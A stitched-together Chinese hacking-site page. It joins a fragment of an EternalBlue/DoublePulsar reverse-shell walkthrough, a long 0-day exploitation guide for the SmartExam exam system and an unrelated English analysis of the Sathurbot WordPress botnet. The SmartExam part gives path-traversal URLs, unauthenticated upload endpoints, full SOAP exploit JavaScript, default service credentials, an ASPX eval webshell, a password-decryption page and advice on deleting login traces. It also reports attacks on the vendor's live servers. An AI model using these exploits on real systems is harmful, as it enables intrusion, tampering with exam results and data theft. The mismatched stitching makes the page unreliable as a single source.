根据提示,输入0创建一个新的项目,项目名为test

接下来使用use Eternalblue,一路回车:

这里要注意,根据提示选项,这里选择1,然后继续一路回车


在kali系统中,利用msf生成一个dll劫持文件,并将s.dll文件拷贝到windows2003的C盘目录下:

在msf下开启msfpaylod监听:


接下来继续在windows2003上执行use Doublepulsar

根据提示选择对应系统,运行dll文件,设置dll文件路径


最后在MSF中可以看到,成功反弹shell,拿到系统权限。

3.漏洞利用工具

PS:由于目前软件还未完善,如果有需要的可以加群获取

4.防御措施

所有Windows系统主机使用防火墙过滤/关闭 137、139、445端口,对于3389远程登录,如果不想关闭可以使用智能卡登录功能.

中国骇客云为您呈现:新为在线 0Day漏洞 欢迎各位学习!

随着网络时代的到来,我们的学习模式受到了前所未有的冲击,在线学习、培训以及考试作为一种新型的学习模式已经悄然兴起,我们的学习不再受时间和空间的限制,你可以根据自己的时间合理安排学习计划,而且足不出户就可以参加统一考试。

中国骇客云平台最新0day漏洞报告!最全的0day漏洞发布网

深圳新为成立于 2003年,作为目前中国最大的学习管理软件提供商之一(笔者按:此评价出自新为官网),时至今日,新为主要研发的产品有SmartLearning学习发展系统、SmartExam在线考试系统、SmartBOS学习运营系统等,成功案例涉及政府机构、税务系统、公安系统、能源交通、高等院校以及电信、金融、医疗、IT等众多行业。

SmartExam在线考试系统(以下简称SmartExam)是国内市场占有率最高的通用化网络考试软件,主要有 2005、2008、2009、2010几种版本,如图1-3,本文重点分析SmartExam最新 0Day漏洞,最后延伸到   SmartLearning、SmartBOS等系统,Google搜索关键字“nwc_755_newvexam”结果如图4。

如履薄冰的新为在线 0Day漏洞分析 入侵检测 第1张

如履薄冰的新为在线 0Day漏洞分析 入侵检测 第2张

系统安全

因为 SmartExam是基于微软.NET平台开发的商业软件,而不是免费的开源软件,所以本文所涉及的内容仅供技术探讨和系统修补,请勿用于破解攻击等非法用途。也因此,虽然笔者在互联网中仔细地百度、Google和Goobye(搜索ftp资源),都没有下载到最新的2010版本,只获得到 SmartExam 2008,尽管是一款数年前的东东,但是通过分析,我们也大致

可以窥一斑见全豹,进而获得通往曙光的钥匙。要想系统分析SmartExam,就必须使用Reflector软件和Reflector.FileDisassembler插件进行反编译,目前Reflector软件已经开始收费,以前免费版本运行时会提示已过期,并且直接删除可执行文件!破解的方法是修改系统时间为 2004年的某个时间,但是退出时还是会删除可执行文件,所以需要备份压缩包。通过源码,我们可以分析出SmartExam软件注册流程,如图5,进一步分析GetProductInfo()函数可以解密新为注册文件的数据格式以及加密方式等,本文不做详细讨论。

如履薄冰的新为在线 0Day漏洞分析 入侵检测 第3张

SmartExam采用了多种技术架构,整体的安全性能比较高的,较好地防止注入等漏洞,功能更加强大,性能更加稳定,同时具备更好的扩展性,其优点的确很多。但是也可能是新为十分在意软件的功能和性能,对产品安全性有些疏忽,导致其安全性脆如纸张,一捅即破,影响到从SmartExam到SmartLearning、SmartBOS等几乎所有新为产品。用户权限验证方式

如果没有登录用户,新为不允许对aspx页面随意访问,当用户访问除IgnoredUrl以外的其他页面时,会将用户的访问重定向为登录页面LoginUrl,默认为

“/customize/nwc_755_newvexam/login/login.aspx”。查看网站根目录中的“newv.sso.dll.config”文件内容,如图6,中“IgnoredUrl”值所设置的页面是可以忽略的页面,这些页面即使没有登录用户也可以直接访问。

如履薄冰的新为在线 0Day漏洞分析 入侵检测 第4张

任意下载漏洞:DownloadFileContent.aspx。反编译的DownloadFileContent.cs源码如图7,首先获取外部变量fileName,然后调用DownLoadFile函数下载文件,其中WebServerFileRootPath默认为“/fileroot”目录,可以使用“..”跳转,于是下载License.ncer文件(产品授权文件)的链接为“

/module/DownloadFileContent.aspx?fileName=../fileroot/License.ncer”,如图8。

如履薄冰的新为在线 0Day漏洞分析 入侵检测 第5张

还可以下载Log目录中的日志文件以及bin目录的dll文件,甚至可以下载到newv.data.dll.config等,下载链接为

“/module/DownloadFileContent.aspx?fileName=../newv.data.dll.config”,如图9,从newv.data.dll.config文件中获得MSSQL连接参数,如图10,像这样的设置,我们可以直接访问到MSSQL数据库服务器,获得网站数据,如图11,其中密文“FE24W1UJNg1QedCl+4dKFw==”的明文为“123456”。

如履薄冰的新为在线 0Day漏洞分析 入侵检测 第6张

甚至还可以使用本地MSSQL企业管理器注册新的“SQLServer组”,如图12,在“安全性——登录”获得该MSSQL服务器中所有登录名和数据库,必要时可以进行暴力破解。

如履薄冰的新为在线 0Day漏洞分析 入侵检测 第7张

当然下载config文件成功率不会很高,因为这还与服务器设置有关。此外还有ExerciseByQuestion.aspx、ExamineByQuestion.aspx等页面不需要登录就可以直接访问,本文不做深入分析。后台页面上传漏洞仍然是权限验证的问题,因为新为的后台页面对管理员验证不足(几乎没有验证),导致只要登录普通用户就可以任意访问后台页面,比如“/module/ResFileManager.aspx”、

“/framework/HtmlEditor/HtmlEditRes/FileUpload.aspx”、

“/fileservice/FileUpload.aspx”、“/fileservice/SingleFileUpload.aspx”

“/user/framework/UserResFileManager.aspx(2010版本的文件)”等,SmartExam所有版本均受此漏洞影响。浏览目录。使用链接“/module/SelectFileOnFileServer.aspx?TargetRootPath=/../”

和“/module/ResFileManager.aspx?TargetRootPath=/../”等,可以跨目录浏览,如图13,图14,如果修改TargetRootPath变量为绝对路径,比如“d:/、c:/”等,还可以浏览其它分区或目录

如履薄冰的新为在线 0Day漏洞分析 入侵检测 第8张

ResFileManager.aspx上传文件。利用链“/module/ResFileManager.aspx?TargetRootPath=/../”不但可以跨目录浏览,还可以直接上传aspx木马文件,如图15,图16。注意:1)使用“TargetRootPath=/../”跳转目录到网站根目录,因为默认上传目录fileroot不能解析aspx,还可以使用“创建”目录名类似“/../temp”的目录,达到跨目录上传文件的目的,演示略;2)使用“IgnoredUrl”值所设置的文件名格式,如“*password.aspx”等,否则必须登录SmartExam才可以访问上传的aspx文件;3)上传页面其实是“/fileservice/SingleFileUpload.aspx”页面,如图17;4)可以对目录或文件进行“删除”、“更名”等操作,这样即使管理员在后台设置“禁止上传的文件后缀名”包含了“aspx”(详见后文),我们依然可以上传jpg等文件,然后“更名”扩展名为aspx,还可以利用“上传自解压文件”上传aspx文件。

如履薄冰的新为在线 0Day漏洞分析 入侵检测 第9张

HtmlEditor.aspx高级编辑器上传文件。访问链接“/framework/HtmlEditor/HtmlEditor.aspx?FileRootPath=/../”打开“高级编辑器”页面,利用“插入附件”上传aspx文件,如图18。

如履薄冰的新为在线 0Day漏洞分析 入侵检测 第10张

注意:1)使用“FileRootPath=/../”,文件将被上传到网站根目录;2)使用“HTML”从源码中获得上传后的文件名;3)“插入附件”实际调用的是“/framework/HtmlEditor/HtmlEditRes/ftb.insertattachment.aspx”页面文件。

FileUpload.aspx上传文件。直接访问“/fileservice/FileUpload.aspx”,页面出错,如图19,这是因为没有提交file对象实例,只要我们外部提交file对象即可。

如履薄冰的新为在线 0Day漏洞分析 入侵检测 第11张

译文件fileservice_FileUpload.cs源码,如图20,可以一次上传多个文件,还可以使用FilePath变量跳转目录,而且没有限制上传文件的类型!

如履薄冰的新为在线 0Day漏洞分析 入侵检测 第12张

提交页面如图21,源码如图22,上传后的文件名使用“*Password.aspx”格式,保证不登录SmartExam用户可以直接访问,上传成功后页面返回“Succeed”,如图23。

如履薄冰的新为在线 0Day漏洞分析 入侵检测 第13张

由于SmartExam2010版本允许直接访问FileUpload.aspx页面,所以在不登录情况下,就能秒杀SmartExam!

asmx文件漏洞可能大家认为上节涉及到的漏洞危害不大,毕竟访问后台页面起码必须登录用户,而这样对系统的危害也仅限于“内部人员”,因为SmartExam默认不允许注册新用户,但是在本节中笔者将爆出asmx漏洞,足以颠覆新为的安全防线。

asmx是WEB服务文件,属于B/S形式,用SOAP方式访问,用XML方式返回数据。SmartExam允许直接访问“*.asmx*”,并且存在多个asmx文件,SmartExam2010包含的asmx文件如图24,而2008版本仅包含其中FileManage.asmx、UserInterface.asmx、ExamInterface.asmx等文件。

如履薄冰的新为在线 0Day漏洞分析 入侵检测 第14张

FileManage.asmx漏洞。顾名思义,该文件主要用于文件的上传、更名、删除等操作,直接访问结果如图25,点击相应的操作(operations)函数,比如“GetLogicalDrives”,获得SOAP1.1或1.2方式的调用和返回数据格式,如图26。

如履薄冰的新为在线 0Day漏洞分析 入侵检测 第15张

SOAP采用了广泛使用的两个协议:HTTP和XML,可以简单理解为:以HTTP方式提交XML格式数据。SOAP1.1的数据格式如下,其中斜体部分是固定不变的,黑体部分是操作函数的调用参数或返回数据,GetLogicalDrives为获得本地磁盘分区函数,没有参数。

<?xmlversion="1.0"encoding="utf-8"?><soap:Envelopexmlns:xsi="http://*******/"xmlns:xsd=http://*******/xmlns:soap="http://*******/"><soap:Body><GetLogicalDrivesxmlns="*******/"/></soap:Body></soap:Envelope>

我们获得XML格式的数据后,剩下的问题就是将这些数据以HTTP方式提交,就可以实现SOAP方式访问WEB服务的asmx文件,最简单的方法是使用XMLHttpRequest对象,页面源码如下:

<head><METAhttp-equiv=Content-Typecontent="text/html;charset=GB2312"></head><scriptlanguage="javascript">varXMLHttpReq=false;//创建XMLHttpRequest对象functioncreateXMLHttpRequest(){if(window.XMLHttpRequest){//Mozilla浏览器XMLHttpReq=newXMLHttpRequest();}elseif(window.ActiveXObject){//IE浏览器try{XMLHttpReq=newActiveXObject("Msxml2.XMLHTTP");}catch(e){try{XMLHttpReq=newActiveXObject("Microsoft.XMLHTTP");}catch(e){}}}}//发送请求函数functionsendRequest(){createXMLHttpRequest();varxml=createXML();url=document.getElementById("url").value;XMLHttpReq.open("POST",url+"/fileservice/FileManage.asmx",true);XMLHttpReq.onreadystatechange=processResponse;//指定响应函数XMLHttpReq.setRequestHeader("Content-Type","text/xml");XMLHttpReq.send(xml);//发送请求}//处理返回信息函数functionprocessResponse(){if(XMLHttpReq.readyState==4){//判断对象状态if(XMLHttpReq.status==200){//信息已经成功返回,开始处理信息varres=XMLHttpReq.responseText;document.getElementById("XMLResult").innerHTML=res;}else{//页面不正常window.alert("您所请求的页面有异常。");}}}//创建XML格式数据functioncreateXML(){varxml="<?xmlversion=\"1.0\"encoding=\"utf-8\"?>";xml=xml+"<soap:Envelopexmlns:xsi=\"http://*******\"xmlns:xsd=\"http://*******\"xmlns:soap=\"http://********\">";xml=xml+"<soap:Body>";//GetLogicalDrives函数获取磁盘分区//xml=xml+"<GetLogicalDrivesxmlns=\"http://*******/\"/>";//GetFileListFromSpecificPath函数获取文件,“\\”网站绝对路径xml=xml+"<GetFileListFromSpecificPathxmlns=\"http://tempuri.org/\">";xml=xml+"<sPath>\\..\\</sPath>";xml=xml+"</GetFileListFromSpecificPath>";//GetDirectories函数获取目录/*xml=xml+"<GetDirectoriesxmlns=\"http://tempuri.org/\">";xml=xml+"<sPath>C:\\</sPath>";xml=xml+"</GetDirectories>";*///WriteTextFile函数写文件/*xml=xml+"<WriteTextFilexmlns=\"http://tempuri.org/\">";xml=xml+"<filePath>D:\\tmp-8000\\smartexam2008\\web\\111.aspx</filePath>";xml=xml+"<fileContent>stringhhhhcvvcvc</fileContent>";xml=xml+"</WriteTextFile>";*/xml=xml+"</soap:Body>";xml=xml+"</soap:Envelope>";returnxml;}</script><bodyvLink="#006666"link="#003366"bgColor="#E0F0F8"><formaction=""method="post"name="myform">ulr:<inputtype="text"size="50"name="url"value="http://"><br><inputtype="button"value="提交"onclick="sendRequest()"></form><Divid="XMLResult"></Div>

关键代码是createXML()函数,生成符合SOAP1.1要求的格式数据。该函数调用FileManage.asmx中的操作函数GetFileListFromSpecificPath,获取参数sPath所指定目录中的文件列表,“\\..\\”指定网站根目录,这样我们可以获取到绝对路径。该函数还给出GetLogicalDrives(获取磁盘分区)、GetDirectories(获取目录)、WriteTextFile(写文本文件)等调用示例,请根据实际情况设置其中的参数。最后复制这段源码并另存为FileManage.asmx.html文件,输入URL获得网站的绝对路径,如图27,呵呵,虽然显示的结果不很美观,但是我们的目的已经达到!

如履薄冰的新为在线 0Day漏洞分析 入侵检测 第16张

操作函数WriteTextFile写文本文件。设置参数filePath为绝对路径“d:\\newway\\smartexam2011\\web\\111password.aspx”,或者相对路径“\\..\\111password.aspx”,文件名使用“*password.aspx”格式;设置参数fileContent为aspx一句话,如“<%@PageLanguage=”Jscript”validateRequest=”false”%><%Response.Write(eval(Request.Item[“w”],”unsafe”));%>

”,特殊字符需要转义,如“<”、“>”必须用ASCII码值“<”、“>”代替,提交的一句话成为“<%@PageLanguage=\”Jscript\”validateRequest=\”false\”%><%Response.Write(eval(Request.Item[\”w\”],\”unsafe\”));%>”,如图28。

如履薄冰的新为在线 0Day漏洞分析 入侵检测 第17张

提交页面返回“false”,表示没有错误,写文件成功,使用客户端连接如图29。

如履薄冰的新为在线 0Day漏洞分析 入侵检测 第18张

FileManage.asmx支持的操作函数非常丰富,如CopyFile(复制文件)、DeleteDirectory(删除目录)、DeleteFile(删除文件)、OpenTextFile(读文本文件)、RenameDirectory(重命名目录)、RenameFile(重命名文件)、UnzipFile(解压缩文件)、UploadFile(上传文件,参数buffer值必须是base64Binary类型数据)、SearchFileFromSpecificPath(搜索文件)等等。详细利用,有兴趣的读者可以自己尝试,本文略。UserInterface.asmx漏洞。用户接口文件framework/api/UserInterface.asmx提供了与用户有关的操作函数,如AddDept(添加部门)、DeleteUserByLoginName(根据登录名删除用户)、Encrypto(获得字符串的Encryp编码,如密码)、GetUserInfoByLoginName(根据登录名获得用户信息)、InsertUserInfo(插入用户信息)、Login(登录用户)、UpdateUserInfo(修改用户信息)等,如图30。

如履薄冰的新为在线 0Day漏洞分析 入侵检测 第19张

在这个用户接口文件中的操作函数几乎都包含两个参数callUserName和callUserPassword,必须通过这两个参数的验证,才能成功调用接口文件中的操作函数,如图31。

如履薄冰的新为在线 0Day漏洞分析 入侵检测 第20张

在反编译文件NvAppSetting.cs源码中找到参数callUserName和callUserPassword的默认值分别为“system”、“system123456”,如图32。

如履薄冰的新为在线 0Day漏洞分析 入侵检测 第21张

提交页面UserInterface.asmx.html与FileManage.asmx.html相似,仅在createXML()函数中调用的操作函数略有所不同,如图33,即修改前文的提交页面源码:首先设置参数callUserName和callUserPassword分别为“system”、“system123456”,然后调用操作函数GetUserInfoByLoginName,获取管理员“admin”的用户信息;最后修改“XMLHttpReq.open(“POST”,url+”/fileservice/FileManage.asmx”,true);”

为“XMLHttpReq.open(“POST”,url+”/framework/api/UserInterface.asmx”,true);”,另存为UserInterface.asmx.html文件。

如履薄冰的新为在线 0Day漏洞分析 入侵检测 第22张

成功获取到管理员admin的用户信息,如图34。

如履薄冰的新为在线 0Day漏洞分析 入侵检测 第23张

破解密码。SmartExam使用SymmetricCryptoMethod.Encrypto()函数加密密码,该函数定义在newv.common.dll文件的SymmetricCryptoMethod类中,反编译源码如图35,这个类中不但定义了Encrypto()函数,还定义了Decrypto()函数,因此我们就可以利用Decrypto()函数破解密码。

如履薄冰的新为在线 0Day漏洞分析 入侵检测 第24张

复制如下代码,保存为Decrypto.aspx文件,上传到SmartExam系统的customize目录中(不登录允许访问“customize/*”,即customize目录中的任意文件),这样便获得一个简易的SmartExam密码破解工具,在地址栏提交需要破解的密文,就可成功破解到明文,

<%@PageLanguage="C#"Debug="true"%><%@ImportNamespace="newv.common"%><%@ImportNamespace="System"%><%@ImportNamespace="System.Web"%><%@ImportNamespace="System.Web.UI"%><%@ImportNamespace="System.Web.UI.HtmlControls"%><head><title>SmartExam密码破解</title></head><%stringstr=Request["str"];Response.Write("破解结果:"+SymmetricCryptoMethod.Decrypto(str));%>

一旦获得管理员密码,我们就可以“正大光明”“堂而皇之”地登录系统,并且获得后台管理权限,如图37,注意SmartExam会详细记录用户登录和各种操作日志,包括删除日志的操作,要想完全删除登录痕迹,必须通过第三方工具连接MSSQL数据库执行delete语句。

如履薄冰的新为在线 0Day漏洞分析 入侵检测 第25张

ExamInterface.asmx提供了与考试相关的接口函数,比如DeleteByExamUid、DeleteByExerciseUid、GetUserExamView等,如图38,调用方式与UserInterface.asmx类似,需要指定参数callUserName和callUserPassword。

如履薄冰的新为在线 0Day漏洞分析 入侵检测 第26张

2010版本还新增了DistInterface.asmx、SmartClient.asmx等接口文件,如图39,图40,如何应用本文不做讨论。

如履薄冰的新为在线 0Day漏洞分析 入侵检测 第27张

如履薄冰的新为在线 0Day漏洞分析 入侵检测 第28张

数据安全

树欲静,而风不止。对于安全隐患人们防之又防,可是各种密码泄漏、用户信息被盗事件时有发生,令人们望而生畏。在线考试系统是不会承载太多的用户信息,我们关注的是系统中的考试信息,比如试题、答案、试卷、成绩等等,一旦系统存在安全隐患,这些信息将显得那么脆弱和苍白。由于SmartExam在验证管理员后台权限方面存在问题,只要用户登录系统,就可以任意访问后台页面文件,因此普通用户也可以完成管理员的操作,比如修改系统设置,管理题库、试卷、用户,新增(导入)管理员等等。SmartExam对于普通用户可以说是“完全开放”,只要给出链接,谁都可以进行管理员的操作。

下面是一些常用的链接:

操作日志:/framework/system/OperateLogList.aspx,如图41。

如履薄冰的新为在线 0Day漏洞分析 入侵检测 第29张

系统设置:/framework/system/SysManageSettingMain.aspx,如图42。利用这个页面可以设置禁止上传的文件类型,默认为“exe;bat;cmd;scr;com”,还可以修改“调用Web服务的用户名和密码”,即参数callUserName和callUserPassword,默认为“system和system123456”。

如履薄冰的新为在线 0Day漏洞分析 入侵检测 第30张

题库管理:

/module/OneTabMain.aspx?MenuCode=exam_question_manage&MenuLink=exam/question/QuestionManage.aspx,如图43。利用这个页面可以“导出”全部试题及标准答案,可以是excel格式或doc格式。

如履薄冰的新为在线 0Day漏洞分析 入侵检测 第31张

试卷管理:

/module/OneTabMain.aspx?MenuCode=exam_paper_and_policy_manage&MenuLink=exam/paper/PaperAndPolicyManage.aspx,如图44,可以浏览生成的“固定”和“随机”试卷

如履薄冰的新为在线 0Day漏洞分析 入侵检测 第32张

考试成绩查询:

/module/OneTabMain.aspx?MenuCode=exam_exam_grade_search&MenuLink=exam/exam/ExamGradeSearch.aspx,如图45。

如履薄冰的新为在线 0Day漏洞分析 入侵检测 第33张

图45

考生成绩查询:

/module/OneTabMain.aspx?MenuCode=exam_user_grade_search&MenuLink=exam/exam/ExamGradeAccountByExamTime.aspx。

考生答卷查看:

/exam/exam/UserPaperPreview.aspx?examGradeUid=528649f6-d06a-40ef-8814-521284f9895d,如图46,只要知道examGradeUid就可以查看答卷,包括答案,然后使用链接“/exam/exam/JudgePaper.aspx?examGradeUid=”或“/exam/exam/JudgePaperByQuestion.aspx?examGradeUid=”进行手工或批量手工评卷。

如履薄冰的新为在线 0Day漏洞分析 入侵检测 第34张

用户管理:

/module/OneTabMain.aspx?MenuCode=framework_user_manage&MenuLink=framework/user/UserManage.aspx,如图47。利用这个页面可以激活“待审批、禁用、锁定”等类型用户,甚至可以通过外部提交“chkIsAdmin=Y”修改用户为管理员。

如履薄冰的新为在线 0Day漏洞分析 入侵检测 第35张

导入用户:

/module/OneTabMain.aspx?MenuCode=framework_user_manage&MenuLink=framework/user/UserImportHZMobile.aspx,如图48。利用这个页面可以新增用户,包括管理员,具体操作:

1)“示例->下载模板”,2)编辑excel文档,添加姓名、登录名、密码(密码可以为空)等用户信息,“是否为管理员”为“Y”,其他项为空,3)“浏览”并“载入”excel文档,4)当“格式检查”无误,如“格式查检完成,没有发现错误格式.”,即可进行“导入”,成功返回“操作完成,成功导入用户[1]人,导入失败[0]人。”。注意:这种方法增加的用户,虽然可以正常登录系统和后台管理,但是因为没有指定用户所属“组织名称”,所以不被管理员管理,也不能管理其他用户,比如“用户管理”、“在线用户”查询不到。

如履薄冰的新为在线 0Day漏洞分析 入侵检测 第36张

在线用户:

/module/OneTabMain.aspx?MenuCode=framework_online_user_list&MenuLink=framework/user/OnlineUserList.aspx。

工具编写

考虑开源共享,笔者放弃Delphi,采用CSS+DIV+JS语言进行工具编写。工具名称:SmartExam0Day漏洞利用工具,设计界面如图49,功能包括:FileUpload.aspx上传漏洞,FileManage.asmx漏洞,UserInterface.asmx漏洞,后台管理常用链接,Decrypto解密源码等。

如履薄冰的新为在线 0Day漏洞分析 入侵检测 第37张

关键技术:

DIV实现页面的框架栏目;

1.XMLHttpRequest对象的生成、调用以及异常处理等;

2.全局变量url的调用,比如表单form的action、链接的href等动态修改;

3.根据不同的Web服务接口函数的参数,显示和设置不同的参数输入栏;

4.根据不同的Web服务接口函数,生成不同的SOAP格式数据;

5.SOAP方式提交数据,数据的特殊字符需要转义,如“<”、“>”必须用ASCII码值“<”、“>”代替;7)返回数据的简单正则处理等;部分代码如图50。使用时,请首先输入以“http://”开头的URL,然后便可以各个功能。

如履薄冰的新为在线 0Day漏洞分析 入侵检测 第38张

功能扩展。采用CSS+DIV+JS语言的优点是:不需要编程环境进行编译,使用任何文本编辑器就可以修改,而且即改即用。为了方便以后对该工具进行功能扩展,本文给出几处修改要点:

增加栏目,比如增加“Decrypto解密源码”,如图51。

如履薄冰的新为在线 0Day漏洞分析 入侵检测 第39张

2)“FileManage.asmx漏洞”栏目增加新函数调用,比如“DeleteFile函数删除文件”,第一、二步如图52,第二步需要注意,如果DeleteFile函数只有一个参数sSourceFile,而且表单“form_2”也没有这个参数sSourceFile的输入栏,这时需要新增一个div,名称为“form_2_4”,内容是sSourceFile的input元素;第三步修改函数ShowForm(m,n),实现选择不同的操作函数,显示不同的参数输入栏,如图53,变量m=2表示与“FileManage.asmx漏洞”有关,m=3表示与“UserInterface.asmx漏洞”有关,变量n为select元素当前所选中option的值,即当前所选中的操作函数,n=5表示选中“DeleteFile函数删除文件”,这时只显示参数sSourceFile的输入栏,代码为“document.getElementById(“form_2_4″).style.display=”block”;”;第四步修改函数createXML(m,n),生成SOAP格式数据,如图54。

如履薄冰的新为在线 0Day漏洞分析 入侵检测 第40张

如履薄冰的新为在线 0Day漏洞分析 入侵检测 第41张

3)“UserInterface.asmx漏洞”栏目增加新函数调用的修改方法类似。

测试实例

本章重点使用“SmartExam0Day漏洞利用工具”(以下简称漏洞利用工具)对新为官网和其它软件进行实测。新为目前共有四种系统提供体验试用,如图55,但是试用账号必需通过申请才能获得,接下来我们使用漏洞利用工具逐一进行实测,不需要用户名直接秒杀。

如履薄冰的新为在线 0Day漏洞分析 入侵检测 第42张

测试SmartExam网址URL为“http://********”,使用“FileManage.asmx漏洞”直接可以浏览网站目录如图56,甚至可以浏览其他的分区和目录,如图57,毕竟.NET属于Users组权限,呵呵,一个简单的aspx木马。

如履薄冰的新为在线 0Day漏洞分析 入侵检测 第43张

再使用“UserInterface.asmx漏洞”获得管理员admin密码,并成功破解,如图58。

如履薄冰的新为在线 0Day漏洞分析 入侵检测 第44张

使用“FileUpload.aspx上传漏洞”,如果页面跳回登录界面,则说明网站不允许直接访问FileUpload.aspx页面,最后使用“WriteTextFile函数写文件”成功,如图59。

如履薄冰的新为在线 0Day漏洞分析 入侵检测 第45张

测试SmartLearning学习发展系统(http://61.145.163.254:8091)、SmartBOS学习运营系统(http://61.145.163.254:8089)、LiveLearning培训会议系统(http://61.145.163.254:8095)全部通过,可以浏览磁盘分区、目录、文件,还可以写入、删除文件和破解管理员密码,后面两个系统允许不登录用户直接访问FileUpload.aspx页面。

我们注意到新为门户网站的页面链接中存在敏感字符“fileroot”,如图60,SmartExam系统用这个目录保存用户上传文件,通过进一步尝试,我们不难发现新为门户网站的目录结构与SmartExam等系统十分相似,可以这样推测:新为的门户网站使用了SamrtExam系统(或者是某种改版),其核心代码也应该相同。

如履薄冰的新为在线 0Day漏洞分析 入侵检测 第46张

访问FileUpload.aspx页面,跳转到登录界面,如图61,确认为SmartBOS系统。

如履薄冰的新为在线 0Day漏洞分析 入侵检测 第47张

直接使用漏洞利用工具进行测试,可以浏览目录和文件、写一句话、获得加密密码,但是在使用Decrypto.aspx破解密码时出现异常错误,页面显示“InvalidlengthforaBase-64chararray.”,如图62。

如履薄冰的新为在线 0Day漏洞分析 入侵检测 第48张

这是因为密文中存在“+”字符,用Request方式接收,“+”字符会漏掉,将“+”字符改为“%2b”,重新破解密码成功,如图63。

如履薄冰的新为在线 0Day漏洞分析 入侵检测 第49张

回顾整个漏洞分析过程,从貌似坚不可摧到弱不禁风,好像与我们开了个莫大的玩笑,真可谓天壤之别,而这一切竟源于SmartExam2008——一个数年前的尘封版本。再次证明了开源与安全的辩证关系,也印证了“堡垒最容易从内部被攻破”的哲理。有了SmartExam2008源码,我们可以顺藤摸瓜,对2010等版本也就窥一斑而知全豹,再根据SmartExam按图索骥对新为的其它软件如SmartLearning、SmartBOS等有所了解。同时也反映出几点信息:新为各种版本之间的差异不是很大,包括跨平台之间如SmartLearning、SmartBOS、SmartExam等,这样做虽然研发效率很高,但是安全性能大打折扣,一旦有一款产品出现问题,将蔓延至整个产品体系。本文虽然是从SmartExam2008入手,但是引发的安全问题涉及到新为的整个产品体系,从系统安全到数据安全。考虑到漏洞危害较大,而新为使用dll进行源码保护,普通用户不可能对系统进行深层次的漏洞防护,只能等待新为对产品进行修补升级,这里笔者仅给出一些简单的防护措施,作为应急:1)在后台的系统设置中,给“禁止上传的文件类型”(默认为“exe;bat;cmd;scr;com”)添加“aspx;asmx;asp;asmx;ashx”等文件类型;修改“调用Web服务的用户名和密码”(默认为“system和system123456”);2)对于2010版本,修改newv.sso.dll.config文件,禁止不登录用户直接访问FileUpload.aspx页面;3)删除或更名所有Web服务的asmx文件,如FileManage.asmx、UserInterface.asmx、ExamInterface.asmx、DistInterface.asmx等,一概不留。

由于新为存在跨目录和用户权限验证不严的天生缺陷,导致普通用户可以跨目录上传文件和任意访问后台页面文件。2010版本也仅在“/framework/desktop/Back*.aspx”一些框架页面中判断是否为管理员,其他后台页面文件依然可以任意访问,因此即使做过以上的漏洞防护措施,也无法防止内部用户的非法使用,比如访问后台页面文件,甚至利用ResFileManager.aspx、HtmlEditor.aspx上传文件,然后更名进行挂马。但是这种情况也只是局限在内部用户,危害程度明显减小许多。

Sathurbot: Distributed WordPress password attack HackersChina分布式WordPress密码攻击

This article sheds light on the current ecosystem of the Sathurbot backdoor trojan, in particular exposing its use of torrents as a delivery medium and its distributed brute-forcing of weak WordPress administrator accounts.

The torrent leecher

Looking to download a movie or software without paying for it? There might be associated risks. It just might happen that your favorite search engine returns links to torrents on sites that normally have nothing to do with file sharing. They may, however, run WordPress and have simply been compromised.

Some examples of search results:

Clicking on some of those links returns the pages below (notice how some even use HTTPS):

The movie subpages all lead to the same torrent file; while all the software subpages lead to another torrent file. When you begin torrenting in your favorite torrent client, you will find the file is well-seeded and thus appears legitimate. If you download the movie torrent, its content will be a file with a video extension accompanied by an apparent codec pack installer, and an explanatory text file. The software torrent contains an apparent installer executable and a small text file. The objective of both is to entice get the victim to run the executable which loads the Sathurbot DLL.

After you start the executable, you are presented with a message like this:

While you ponder your options, bad things start to happen in the background. You have just become a bot in the Sathurbot network.

Backdoor and downloader

On startup, Sathurbot retrieves its C&C with a query to DNS. The response comes as a DNS TXT record. Its hex string value is decrypted and used as the C&C domain name for status reporting, task retrieval and to get links to other malware downloads.

Sathurbot can update itself and download and start other executables. We have seen variations ofBoaxxe, Kovter and Fleercivet, but that is not necessarily an exhaustive list.

The Sathurbot then reports its successful installation along with a listening port to the C&C. Periodically, it reports to the C&C that it is alive and well, waiting for additional tasks.

Web crawler

Sathurbot comes with some 5,000 plus basic generic words. These are randomly combined to form a 2-4 word phrase combination used as a query string via the Google, Bing and Yandex search engines.

From the webpages at each of those search result URLs, a random 2-4 word long text chunk is selected (this time it might be more meaningful as it is from real text) and used for the next round of search queries.

Finally, the second set of search results (up to first three pages) are harvested for domain names.

The extracted domain names are all subsequently probed for being created by the WordPress framework. The trick here is to check the response for the URL http://[domain_name]/wp-login.php.

Afterward the root index page of the domain is fetched and probed for the presence of other frameworks. Namely, they are also interested in: Drupal, Joomla, PHP-NUKE, phpFox, and DedeCMS.

Upon startup, or at certain time intervals, the harvested domains are sent to the C&C (a different domain is used than the one for the backdoor – a hardcoded one).

Distributed WordPress password attack

The client is now ready to get a list of domain access credentials (formatted aslogin:password@domain) to probe for passwords. Different bots in Sathurbot’s botnet try different login credentials for the same site. Every bot only attempts a single login per site and moves on. This design helps ensure that the bot doesn’t get its IP address blacklisted from any targeted site and can revisit it in the future.

During our testing, lists of 10,000 items to probe were returned by the C&C.

For the attack itself, the XML-RPC API of WordPress is used. Particularly the wp.getUsersBlogsAPI is abused. A typical request looks like:

The sequence of probing a number of domain credentials is illustrated in the following figure:

The response is evaluated and results posted to the C&C.

Torrent client – seeder

The bot has the libtorrent library integrated and one of the tasks is to become a seeder – a binary file is downloaded, torrent created and seeded.

The BitTorrent bootstrap

That completes the cycle from a leecher to an involuntary seeder:

Note: Not every bot in the network is performing all the functions, some are just web crawlers, some just attack the XML-RPC API, and some do both. Also, not every bot seems to be seeding a torrent.

Impact

The above-mentioned attempts on /wp-login.php from a multitude of users, even to websites that do not host WordPress, is the direct impact of Sathurbot. Many web admins observe this and wonder why it is happening. In addition, WordPress sites can see the potential attacks onwp.getUsersBlogs in their logs.

Through examination of logs, system artifacts and files, the botnet consists of over 20,000 infected computers and has been active since at least June 2016.

Occasionally, we have seen torrent links being sent by email as well.

Detection

Web Admins – Check for unknown subpages and/or directories on the server. If they contain any references to torrent download offers, check logs for attacks and possible backdoors.

Users – Run Wireshark with the filter http.request with no web browser open to see too many requests like GET /wp-login.php and/or POST /xmlrpc.php. Alternatively, check for files or registry entries listed in the IoC section, below.

ESET users are protected from this threat on multiple levels.

Removal

Web Admins – Change passwords, remove subpages not belonging to site, optionally wipe and restore the site from a backup.

Users – Using a third-party file manager find the suspect .DLL (note that the files and directories have the hidden attribute set), open Process Explorer or Task Manager, kill explorer.exeand/or rundll32.exe, delete (quarantine) the affected .DLL, reboot.

Note: this will remove Sathurbot only, and not any other malware it may have also downloaded.

